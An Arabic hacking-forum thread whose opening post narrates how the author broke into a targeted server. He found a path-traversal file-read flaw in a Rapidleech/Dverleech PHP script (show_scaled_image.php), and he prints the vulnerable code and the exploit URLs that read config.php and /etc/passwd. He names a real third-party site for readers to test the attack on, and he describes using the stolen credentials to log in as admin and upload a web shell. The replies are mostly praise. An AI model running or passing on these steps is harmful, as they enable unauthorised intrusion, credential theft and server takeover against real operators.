حالة الموضوع:
مغلق
  1. αЗѕαя

    αЗѕαя DeveloPer Plus

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    152
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الإقامة:
    بلاد الحرمين الشريفين
    السلام عليكم ورحمه الله وبركاته

    كيف حالكم ان شاء الله بخير وصحه وعافيه

    قبل فترة .. كنت مستهدف .. موقع على سيرفر :{6}:

    بغض النظر عن اسمه s1


    حاولنا يمين يسار .. لا فائده )A:"

    بحثت في السكربتات .. الي موجوده في مواقع السيرفر

    شفت سكربت .. مركبته أحدى المواقع

    اسمه


    Rapidleech PlugMod (eqbal) rev. Rev 43 Development Stage

    ممتاز .. نزلته .. على السيرفر المحلي

    قلنا نبحث فيه عن ثغرااات .. تفيدنا في الدخول للسيرفر &:"

    نحمل هالبرنامج .. قبل كل شئ !!:{

    [NOTE]phpbugscanner[/NOTE]
    لمن لا يريد التحميل .. يبحث في قوقل !!

    phpbugscanner

    نفتح البرنامج


    [​IMG]

    وظيفة البرنامج يبحث لك عن دوال معينة .. مو شرط اذا وجدها انها ثغره

    فقد يكون الملف المصاب فيها اما ملفتر ومحمي او على مسارها هتكسس

    وبالنسبة للمربع الي على اليسار فيه دوال الي يبحث عنها البرنامج في السكربت ونستغلها في اختراق السكربت

    طبعا .. نقدر نضيف دوال من عندنا بالاضافه الى الدوال الموجوده


    [​IMG]

    بعد ما حملنا السكربت

    نفك الضغط عنه على مسار السيرفر المحلي
    bl"eh"
    كود PHP:
    C:AppServwww
    [​IMG]

    ممتاز

    ناخذ مسار .. السكربت

    ونحطه في البرنامج
    &:"

    [​IMG]

    وبعدها نضغط Scan

    [​IMG]

    كما في الصورة اعلاه

    البرنامج وظيفته اظهار جميع الدوال الموجوده فيه .. او الي التي اضفتها

    الان ندخل على السكربت من المتصفح
    &:"

    [​IMG]

    نرجع للبرنامج ونشوف الدوال الي يمكن نستثمرها

    طبعا بعد البحث و التمحص s1

    لفت نظرنا هالدالة

    [​IMG]

    نشوف الملف المصاب

    الي هو

    show_scaled_image.php

    نفتحه كما هو واضح بالبرنامج السطر رقم 24 الاصابه


    [​IMG]

    نشرح الموجود

    كود PHP:
    <?PHP
    //dirLIST v0.3.0 image scaling file
    error_reporting(0);
    $image_path '../'.rawurldecode($_GET['image_path']);

    $extension strtolower(strrchr(base****($image_path), '.'));

    switch(
    $extension)
    {
        case 
    '.jpg'header('Content-type: image/jpeg'); break;
        case 
    '.jpeg'header('Content-type: image/jpeg'); break;
        case 
    '.png'header('Content-type: image/png'); break;
        case 
    '.gif'header('Content-type: image/gif'); break;
    }

    $image_attribs getimagesize($image_path);

    $scaled_***** = 584;
    $scaled_****** = 360;

    //check if image is smaller than a required dimensions of 584 x 360...in which case just show the image
    if($image_attribs[0] <= $scaled_***** && $image_attribs[1] <= $scaled_******)
    {
        
    readfile($image_path);
    نلاحظ هنا

    الداله readfile

    كود PHP:
    readfile($image_path);
    تستدعي القيمة
    كود PHP:
    $image_path
    ولانها غير ملفتره او محمية بالمعنى الاصح

    فنقدر نستدعي اي ملف نبي

    والقيمة $image_path معرفه في اول الملف بـ نفسها

    كود PHP:
    $image_path '../'.rawurldecode($_GET['image_path']);
    ان شاء الله اوضحت الصورة &:"

    لكن حتى نقدر نرجع بالمسارات .. بالشكل المطلوب عن طريق

    ../../ الخ

    ونعرف في اي مسار حنا .. او مسار القيمة المصابه

    فلاحظنا .. انها مسبوقه بــ /.. .. كما هو واضح هنا
    كود PHP:
    $image_path '../'.rawurldecode($_GET['image_path']);
    يعني راح يكون مساري في القيمة المصابه في مجلد dirLIST_files

    وليس مجلد الملف الصاب gallery_files

    اي خلف المجلد المصاب

    رابط الاستغلال النهائي بيكون كذا

    كود PHP:
    http://127.0.0.1/ir/Dverleech-Mod-v2.1.2-22-Mar-2012/dverleech/dirLIST_files/gallery_files/show_scaled_image.php?image_path=localfile
    طبعا مثل ما ذكرت اعلاه .. مجلد ir والي بعدها. واضعها من عندي

    يعني لو كان التطبيق على موقع بيكون مثل الشكل هذا

    كود PHP:
    http://127.0.0.1/path/dirLIST_files/gallery_files/show_scaled_image.php?image_path=localfile
    طيب وش الي موجود ايضا في مسار المجلد هذا dirLIST_files

    [​IMG]

    ملف الكونفيج config.php ممتاز نحاول نقراه

    و نشوف اذا الملف مصاب فعلا ولا لأ

    فيكون ناتج الاستغلال لقراء ملف الكونفيج مثل كذا

    كود PHP:
    http://127.0.0.1/ir/Dverleech-Mod-v2.1.2-22-Mar-2012/dverleech/dirLIST_files/gallery_files/show_scaled_image.php?image_path=config.php
    نضعه في المتصفح

    [​IMG]

    اطلعت صفحه بيضاء .. لكن صبر .. هذا الي يحصل مع استعمالنا لداله readfile بدون echo

    لكن مو معناتها انه ما قراء لنا الملف

    نسوي استعراض للسورس
    #:"


    [​IMG]

    على طول نروح للوحة التحكم الموقع المراد

    ويكون مسارها كالتالي

    كود PHP:
    http://127.0.0.1/path/dirLIST_files/admin_login.php
    ونضع البيانات ونرفع الشيل

    او اننا .. نرفع شيل عن طريق اي مركز رفع في السكربت بصيغه jpg

    وسنتعرضه عن طريق الثغره اعلاها .. كما وضحت لكم الطريقة في درس سابق

    او اننا نقرا اليوزرات

    الخ الخ الخ

    و الثغره للامانه لم ابحث هي مكتشفها من قبل ام لأ

    لكن على بحثي السريع لم اجد لها ثغره

    ولله الحمد و المنه قدرت اوصل للسيرفر الي ابيه عن طريقها .. مع بعض الاضافات

    و السكربت .. قد يكون مصاب بغيرها

    واغلب مسارات المجلدات فيه محمية بهتكسس .. يعطيك فوربيدن حتى لو حاولت تستعرض الملف

    الغرض من الموضوع

    تجربة عدة طرق واساليب وبحث واختبار تطبيقات للوصول لهدفك

    استغرق مني البحث و الوصول لهذه الثغره عدة ساعات .. بحكم اني افحص يدوي + الوقوف عند كل دالة .. والبحث بعض الاحيان في قوقل .. عند بعض الدوال الجديده علي

    وهذه موقع لتجربة الثغره عليها

    كود PHP:
    http://www.downloadbooks.ir/dirLIST_files/gallery_files/show_scaled_image.php?image_path=config.php
    http://www.downloadbooks.ir/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../etc/passwd
    واعذروني اذا بعض المصطلحات البرمجية .. فيها خطأ فكنت احاول ايصال المعلومه قدر الامكان &:"

    اتمنى ان الموضوع افادكم ولو بشئ قليل


    )5:"

    [​IMG]
     
    2 شخص معجب بهذا.
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. яσ¢к нα¢кєя

    яσ¢к нα¢кєя Developer

    الأنتساب:
    ‏24 مارس 2012
    المشاركات:
    67
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Taif
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    لاهنت يالغلا وبيض الله وجهك ~ )5:"
    (( جعل والديك الجنه يارب )) قول امين ~ &:" ​
     
  4. •● ṔriNḉẻ ●•

    •● ṔriNḉẻ ●• DeveloPer Plus

    الأنتساب:
    ‏5 يناير 2013
    المشاركات:
    100
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    Hollywood
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    وُعليكم السلآم ورحمة الله وبركاتة
    وآصل يابطل + تستاهل أحلى تقييم ..
     
  5. Я Ỉ ЙČЗ ק

    Я Ỉ ЙČЗ ק Developer

    الأنتساب:
    ‏23 ديسمبر 2011
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ™IQ-T34M
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    شرح وافي وكافى من شخص مبدع
    ولك خالص تحياتي :{1}:​
     
  6. ĸʜɜʟɛɒ

    ĸʜɜʟɛɒ Active DeveloPer

    الأنتساب:
    ‏3 نوفمبر 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    Gaza
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    الله يعطيك الف عافيه يارب
    مودتي للك يالغالي :{1}:
     
  7. мαĢ!c нαк

    мαĢ!c нαк Developer

    الأنتساب:
    ‏15 يناير 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    iraq-t34m
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    الله يرحم والديك عن النار ويحفظلك احبابك
    مشكور اخوي
    %:"​
     
  8. MaDe IN K.s.A

    MaDe IN K.s.A <div class="smallfont"><script src="http://www.iq- ExpErt DeveloPer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    111
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    ksa
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    بارك الله فيك
    وجعله في ميزان حسناتك
    تحياتي*:"​
     
  9. Wo0oLf

    Wo0oLf DeveloPer Plus

    الأنتساب:
    ‏22 مارس 2012
    المشاركات:
    123
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الوظيفة:
    طالب جامعي Computer science
    الإقامة:
    مقيم في لبنان
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    مشاءالله عليك اخوي
    مشكور ماقصرت وجزاك الله خير
     
  10. вαиɒєя

    вαиɒєя DeveloPer Plus

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    142
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    طآلب
    الإقامة:
    k.s.a
    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    الله يعطيك الف عافية
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة